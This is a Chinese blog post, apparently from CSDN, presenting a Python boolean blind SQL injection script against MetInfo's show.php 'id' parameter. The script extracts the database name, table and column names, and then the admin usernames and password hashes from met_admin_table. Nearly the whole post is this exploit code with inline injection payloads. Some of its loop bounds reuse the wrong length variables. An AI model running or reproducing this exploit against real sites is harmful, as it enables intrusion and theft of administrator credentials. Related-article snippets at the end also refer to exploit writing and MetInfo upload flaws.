Metinfo-脱库python编写

最新推荐文章于 2024-05-30 11:43:13 发布
最新推荐文章于 2024-05-30 11:43:13 发布
阅读量68 收藏
点赞数 1
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22792465/article/details/131858576
版权

部署环境:xampp 、Metinfo

# metinfo-sqlmap.py
# for循环循环顺序放反时候会直接输出a-z

import requests,string

number = string.printable.strip()
field = "13300000000"
url = "http://***/Metinfo/about/"

headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
    }

for i in range(20) :
    payload = f"show.php?lang=cn&id=22 and length(database())={i} --+"
    full_url = url + payload
    # print(full_url)
    res = requests.get(url = full_url,headers = headers)
    if field in res.text :
        db_number = i
        print(f"数据库长度:{db_number}")
        break

db_number = ""
for i in range(1,8) :
    for asc_ii in number :
        payload = f"show.php?lang=cn&id=22 and ascii(substr((select database()),{i},1))={ord(asc_ii)} --+"
        full_url = url + payload
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_number += asc_ii
            print(f"数据库名:{db_number}")
            break

for i in range(400) :
        payload = f"show.php?lang=cn&id=22 and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))={i} --+" 
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_tables_len = i
            print(f"数据库表名长度:{db_tables_len}")
            break

db_tables = ""
for i in range(1,db_tables_len+1) :
    for asc_ii in number :
        payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))={ord(asc_ii)} --+"
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_tables += asc_ii
            db_tbs = db_tables
            print(f"数据库表名:{db_tbs}")
            break

for i in range(400) :
        payload = f"show.php?lang=cn&id=22 and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65))={i} --+" 
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_columns_len = i
            print(f"数据库列名长度:{db_columns_len}")
            break

db_columns = ""
for i in range(1,db_tables_len) :
    for asc_ii in number :    
        payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65),{i},1))={ord(asc_ii)} --+"
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_columns += asc_ii
            print(f"数据库列名:{db_columns}")
            break


for i in range(50) :
        payload = f"show.php?lang=cn&id=22 and length((select group_concat(admin_id,admin_pass) from met_admin_table))={i} --+" 
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_dump_len = i
            print(f"数据库列名字段长度:{db_dump_len}")
            break

db_dump = ""
for i in range(1,db_columns_len + 1) :
    for asc_ii in number :    
        payload = f"show.php?lang=cn&id=22 and ascii(substr((select group_concat(admin_id,0x2d2d,admin_pass) from met_admin_table),{i},1))={ord(asc_ii)} --+"
        full_url = url + payload
        # print(full_url)
        res = requests.get(url = full_url,headers = headers)
        if field in res.text :
            db_dump += asc_ii
            print(f"数据库列名字段:{db_dump}")
            break

 

 

 

 

 

 

泷泷_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
脱库了解一下
10-14
适用于小白,和开发人员了解的网络安全知识,防sql注入风险。
MetInfo 企业建站系统 v5.3.16
12-01
MetInfo 企业建站系统,是一套非常适合企业新手建站的cms,非常轻量,有自己的函数并且有官方的手册,如果你有一些 php 基础的话,修改起来还是比较方便的。我用 Metinfo 建了几个站,
MetInfo 标签函数-模板制作教程-MetInfo使用教程.mht
06-06
MetInfo 标签函数-模板制作教程-MetInfo使用教程
metinfo龙达企业自适应模板
09-01
metinfo龙达企业自适应模板
metinfo_5.0.4 EXP Python脚本编写
qq_45953122的博客
09-23 207
拿 sqlmap 跑,发现只检测出了延时注入,而没有检测出存在布尔盲注,而延时注入的成本要比布尔盲注的成本要高许多,所以我们就可以自己写一个布尔盲注脚本。获取到表名之后,怎么拿到管理员账密,因为metinfo是一个出名的网站管理系统,我们可以通过百度搜一下他的数据库结构。在每次循环中,代码构造一个 payload 用于获取数据库名称和所有表名的字符。代码进入一个嵌套循环,外层循环遍历数据库名称的每个字符位置,内层循环遍历在 ASCII 可打印字符集
python语言的第三方库_一款 Python 语言的 HTTP 第三方库
weixin_39629617的博客
01-12 189
_ _ _ _ _| |__ __ _ ___| | _| |__ | |_| |_ _ __| '_ \ / _` |/ __| |/ / '_ \| __| __| '_ \| | | | (_| | (__| |_| |_|\__,_|\___|_|\_\_| |_|\__|\__| .__/|_| 简介hackhttp 是四叶草安...
EXP武器库编写
过期的秋刀鱼
09-23 248
pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。
【CyberSecurityLearning 68】python 编写exp
_Co1a
04-15 442
目录 python 编写exp 用python脚本实现布尔盲注 用python脚本实现延时注入 文件上传 python 编写exp exp:漏洞利用工具 以Web 漏洞为主 要求: 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境:python3 核心模块:requests requests模块介绍详细请看:https://blog.csdn.net/Waffle666/article/details/115720052 定制头部 重新定义User-Agen.
MetInfo 6.1.2sql全自动脚本
12-24
该脚本适合于MetInfo 6.1.2的布尔盲注,功能包括可以拿到库中数据等,同时还有一些函数没有被调用,可根据自己的需求调用
061 python实现EXP
鸡蛋炒鸡蛋
04-20 4874
文章目录一:概述二:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
漫话:如何给女朋友解释什么是撞库、脱库和洗库?
weixin_43167418的博客
03-23 1274
最近,安全圈又有一个大新闻,微博名为@安全_云舒的微博用户在发文称:“很多人的手机号码泄露了,根据微博账号就能查到手机号……已经有人通过微博泄露查到我的...
***经验总结
weixin_33762130的博客
12-31 112
首发T00ls: 之前某个大大发了刷库的经验~看完很受益~于是今儿最后一天写点儿东西放出来吧~ -----------------金盆洗手很长时间---------------------- ***最简单的形式~找SqlInj点直接写脚本拖~ 偶尔碰上狗屎运能找到明显的没过滤得Inj点~那你就偷着乐去吧~ 不过大部分的时候都是比较纠结的~我一般判断都是-0或-1这...
(云安全)拖库-洗库-撞库
Raywit的博客
08-04 2677
一,背景: 用户数据泄露一直是如今互联网世界的一个焦点,从最近的京东撞库抹黑事件,到之前的CSDN,如家用户数据的泄露,服务商和黑客之间在用户数据这个舞台上一直在进行着旷日持久的攻防战。 对于大多数用户而言,撞库可能是一个很专业的名词,但是理解起来却比较简单,撞库是黑客无聊的“恶作剧”,黑客通过收集互联网已泄露的用户+密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登陆的用户。  以京东之前的撞库举例,首先京东的数据库并没有泄漏。黑客只不过通过“撞库”的手法,“凑巧”获取.
如何mysql数据导入到mongdb
codemami的博客
05-30 768
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
Python 具体能干什么?
猿小白的博客
05-26 1240
Python 是一种功能强大、用途广泛的编程语言,因其简洁易读的语法和丰富的库生态系统而备受欢迎。
在linux服务器上使用tensorboard,错误记录
最新发布
wwwwzm的博客
05-30 477
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
Pandas03
Bianca427的博客
05-27 1225
聚合计算时新增一列计算最大值与平均值的差值df.groupby('district').agg(最低工资=('salary', 'min'), 最高工资=('salary', 'max'), 平均工资=('salary', 'mean'), 最大值与均值差值=('salary', myfunc)).rename_axis(["行政区"])
metinfo文件上传
09-01
所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* [【文件上传漏洞-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值